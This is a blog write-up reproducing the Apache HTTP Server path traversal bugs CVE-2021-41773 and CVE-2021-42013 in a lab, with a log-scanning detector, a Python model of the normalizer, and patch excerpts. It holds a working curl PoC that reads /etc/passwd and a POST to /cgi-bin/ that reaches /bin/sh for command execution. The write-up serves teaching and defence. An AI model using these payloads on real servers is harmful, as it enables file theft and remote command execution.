CVE-2021-41773 (42013) reproduction of the Apache HTTP Server path traversal vulnerability

1, Vulnerability overview

Apache HTTP Server (Apache for short) is an open-source web server that runs on most operating systems. Because it is cross-platform and secure, it is widely used and is one of the most popular web server programs. It is fast and reliable, and interpreters such as Perl and Python can be compiled into the server through simple API extensions.

Apache has disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, CVE-2021-41773, and released 2.4.50 to fix it. The vulnerability allows an attacker to bypass the path traversal protection and, by percent-encoding the path, read arbitrary files on the web server's file system. Both Linux and Windows servers running this version of Apache are affected. The vulnerability was introduced in 2.4.49 by a change intended to improve the performance of URL validation; an encoded "." can be used to bypass the new validation. If the Apache configuration does not set "Require all denied" on the file system, exploitation is relatively simple: by encoding these characters and modifying the URL with the payload, the classic path traversal is achieved.

-https://blog.csdn.net/qq_48985780/article/details/120973100

 

2, Affected versions
  • CVE-2021-41773: version 2.4.49 only
  • CVE-2021-42013: versions 2.4.49 and 2.4.50

 

3, Vulnerability principle

  1. Trick about %2e in SpringBoot
  2. What is the problem with the vulnerable function
  3. What is directory traversal

 

4, Vulnerability reproduction environment

Kali Linux + Vulfocus
Attacker machine: Kali Linux
Target: Vulfocus

 

5, Experimental steps

1. Start the image environment and open the page

2. Try to view the contents of /etc/passwd using the PoC command that has already been published

curl -v --path-as-is http://192.168.117.131:51212/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

3. Construct the following request in Burp Suite to obtain the flag; done.

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 192.168.117.131:51212
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cde381698600-gzip"
If-Modified-Since: Sat, 09 Oct 2021 03:58:16 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

echo;ls  /tmp
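As an added defensive example (not part of the original write-up), the following Python script scans Apache combined-format access log lines for the encoded dot segments seen in the two requests above. Apache logs the request line exactly as it was sent, so the encoded form is visible in the log. The log lines, client addresses and paths in it are constructed for the example.

```python
"""Added example (not from the original write-up): flag the encoded
dot-segment requests used against CVE-2021-41773 / CVE-2021-42013 in
Apache combined-format access logs. The sample log lines are constructed."""

import re

# The quoted request line of the combined log format: "METHOD path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"')

# One path segment that turns into ".." after one or two rounds of decoding:
# two "dots", each a literal '.', a single-encoded %2e, or the double-encoded
# %%32%65 form. A plain literal ".." is not flagged: the server normalizes it
# and it is not what these two CVEs are about.
DOTDOT_SEGMENT = re.compile(r"(?:\.|%2e|%%32%65){2}", re.IGNORECASE)


def classify(path):
    """Return a finding for a request path that carries encoded '..' segments,
    or None for an ordinary path."""
    encoded = [seg for seg in path.split("/")
               if "%" in seg and DOTDOT_SEGMENT.fullmatch(seg)]
    if not encoded:
        return None
    double = any("%%32%65" in seg.lower() for seg in encoded)
    return {
        "cve": "CVE-2021-42013" if double else "CVE-2021-41773",
        "depth": len(encoded),                        # directory levels the request tries to climb
        "cgi": path.lower().startswith("/cgi-bin/"),  # cgi-bin target: command execution risk, not only file read
    }


def scan_line(line):
    """Parse one access log line and classify its request path."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    finding = classify(m.group("path"))
    if finding is None:
        return None
    finding.update(method=m.group("method"), path=m.group("path"))
    return finding


def scan_log(lines):
    """Return the findings for every line that carries an encoded traversal."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


# Constructed sample log (TEST-NET addresses; paths mirror the requests in this write-up).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2021:04:01:02 +0000] "GET /icons/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.79.1"',
    '192.0.2.10 - - [09/Oct/2021:04:01:05 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Oct/2021:04:02:00 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Oct/2021:04:02:01 +0000] "GET /docs/../index.html HTTP/1.1" 200 3456 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A POST to /cgi-bin/ with such segments deserves a higher priority than a GET for /etc/passwd, since with mod_cgi enabled it means an attempt at command execution rather than a file read; the `cgi` flag in the finding is there for that triage.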

 

6, Repair method

1) CVE-2021-41773: version 2.4.50 modifies the ap_normalize_path function and adds the following code, which handles the encoded form %2e in dot segments so that this bypass no longer works.

/* n indexes the character after the leading dot of a segment: accept either
 * a literal '.' or an encoded %2e / %2E as the second dot, so that ".%2e",
 * "%2e." and "%2e%2e" are handled as ".." instead of slipping through */
if ((path[n] == '.' || (decode_unreserved
                        && path[n] == '%'
                        && path[++n] == '2'
                        && (path[++n] == 'e'
                            || path[n] == 'E')))
    && IS_SLASH_OR_NUL(path[n + 1])) {
    /* Wind w back to remove the previous segment */
    if (w > 1) {
        do {
            w--;
        } while (w && !IS_SLASH(path[w - 1]));
    }
    else {
        /* Already at root, ignore and return a failure
         * if asked to.
         */
        if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) {
            ret = 0;
        }
    }
    /* Move l forward to the next segment */
    l = n + 1;
    if (path[l]) {
        l++;
    }
    continue;
}
--https://xz.aliyun.com/t/10359?page=1

2) CVE-2021-42013: version 2.4.51 makes several changes for this vulnerability. The core change is in the ap_normalize_path function, where the validation of URL encoding is strengthened: if a non-standard percent-encoding is found (a "%" that is not followed by two hexadecimal characters), an encoding error is returned, which fundamentally eliminates the bypass through multiple rounds of encoding. The repair code is as follows:

while (path[l] != '\0') {
    /* RFC-3986 section 2.3:
     *  For consistency, percent-encoded octets in the ranges of
     *  ALPHA (%41-%5A and %61-%7A), DIGIT (%30-%39), hyphen (%2D),
     *  period (%2E), underscore (%5F), or tilde (%7E) should [...]
     *  be decoded to their corresponding unreserved characters by
     *  URI normalizers.
     */
    if (decode_unreserved && path[l] == '%') {
        if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
            const char c = x2c(&path[l + 1]);
            if (TEST_CHAR(c, T_URI_UNRESERVED)) {
                /* Replace last char and fall through as the current
                 * read position */
                l += 2;
                path[l] = c;
            }
        }
        else {
            /* Invalid encoding: a '%' not followed by two hex digits
             * (for example the "%%32%65" used to double-encode a dot)
             * now fails normalization instead of being passed through */
            ret = 0;
        }
    }
    /* ... the rest of the loop body (dot-segment handling and copying
     * path[l] to path[w]) is omitted in the original excerpt ... */
}
--https://xz.aliyun.com/t/10359?page=1
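To make the two fixes in this section and the bypass described in the overview concrete, here is an added Python model of how the normalizer behaved in 2.4.49, 2.4.50 and 2.4.51. It is a simplified teaching model written for this page, not httpd's ap_normalize_path; the Alias directories and document root in it are assumed values. It models 2.4.49 as checking dot segments on the raw text and decoding only afterwards, 2.4.50 as decoding unreserved characters once before the check, and 2.4.51 as rejecting malformed percent-encoding as the code above does; the later full decode during filesystem mapping is what turns a surviving ".%2e" into "..".

```python
"""Simplified model of Apache httpd's ap_normalize_path() behaviour in
2.4.49, 2.4.50 and 2.4.51 (added teaching example, not httpd's own code).

It shows why ".%2e" slipped past the 2.4.49 dot-segment check, why
".%%32%65" still slipped past 2.4.50, and how 2.4.51's rejection of
malformed percent-encoding closes the hole."""

import posixpath
from urllib.parse import unquote

# RFC 3986 unreserved characters: the only ones the normalizer decodes.
UNRESERVED = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                 "abcdefghijklmnopqrstuvwxyz0123456789-._~")
HEXDIGITS = set("0123456789abcdefABCDEF")

# Assumed Alias / DocumentRoot layout (constructed for this example).
ALIASES = {
    "/icons/": "/usr/share/apache2/icons/",
    "/cgi-bin/": "/usr/local/apache2/cgi-bin/",
}
DOCUMENT_ROOT = "/var/www/html"


def decode_unreserved(path, strict):
    """Decode %XX only when XX is an unreserved character (2.4.50 behaviour).
    With strict=True (2.4.51) a '%' that is not followed by two hex digits is
    an encoding error and raises instead of being passed through."""
    out = []
    i = 0
    while i < len(path):
        ch = path[i]
        if ch == "%":
            pair = path[i + 1:i + 3]
            if len(pair) == 2 and all(h in HEXDIGITS for h in pair):
                c = chr(int(pair, 16))
                if c in UNRESERVED:
                    out.append(c)
                    i += 3
                    continue
                # Reserved character such as %2F: deliberately left encoded.
            elif strict:
                raise ValueError("invalid percent-encoding at offset %d" % i)
        out.append(ch)
        i += 1
    return "".join(out)


def normalize_path(path, version):
    """Remove '.' segments and resolve '..' segments the way the modelled
    version would. Returns the normalized URL path, or None when the
    request is rejected (httpd answers 400)."""
    if version == "2.4.49":
        work = path  # the dot check sees the raw, still-encoded segment text
    else:
        try:
            work = decode_unreserved(path, strict=(version == "2.4.51"))
        except ValueError:
            return None
    segments = []
    for seg in work.split("/"):
        if seg == ".":
            continue
        if seg == "..":
            if len(segments) > 1:   # segments[0] is the empty root marker
                segments.pop()
            continue                # '..' at the root is simply ignored
        segments.append(seg)
    normalized = "/".join(segments)
    if version == "2.4.49":
        # 2.4.49 decoded unreserved characters in place, but only after the
        # check above had already looked at the segment.
        normalized = decode_unreserved(normalized, strict=False)
    return normalized


def map_to_filesystem(url_path):
    """Later request processing: the path is fully percent-decoded and an
    Alias prefix is swapped for its directory. This second decode is what
    turned a surviving '.%2e' into '..' on the filesystem."""
    decoded = unquote(url_path)
    for prefix, directory in ALIASES.items():
        if decoded.startswith(prefix):
            return posixpath.normpath(directory + decoded[len(prefix):]), directory
    return posixpath.normpath(DOCUMENT_ROOT + decoded), DOCUMENT_ROOT


def resolve(request_path, version):
    """Return (filesystem_path, escaped) for a request against the modelled
    version, or ("REJECTED", False) when normalization fails."""
    normalized = normalize_path(request_path, version)
    if normalized is None:
        return "REJECTED", False
    fs_path, base = map_to_filesystem(normalized)
    return fs_path, not fs_path.startswith(base)


if __name__ == "__main__":
    single = "/icons/" + ".%2e/" * 7 + "etc/passwd"
    double = "/icons/" + ".%%32%65/" * 7 + "etc/passwd"
    for req in (single, double, "/icons/apache_pb.gif"):
        for version in ("2.4.49", "2.4.50", "2.4.51"):
            print("%-7s %-60s -> %s" % (version, req, resolve(req, version)))
```

Running it shows the three outcomes side by side: 2.4.49 lets both payloads reach /etc/passwd, 2.4.50 neutralizes the single-encoded one (it becomes a harmless request for /etc/passwd under the document root) but not the double-encoded one, and 2.4.51 rejects the double-encoded request outright. The model also makes clear why "Require all denied" on the filesystem root matters independently of the patch: the traversal only pays off when the resolved path is one the server is allowed to serve.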

  

 

Posted by waltonia on Fri, 03 Jun 2022 07:12:18 +0530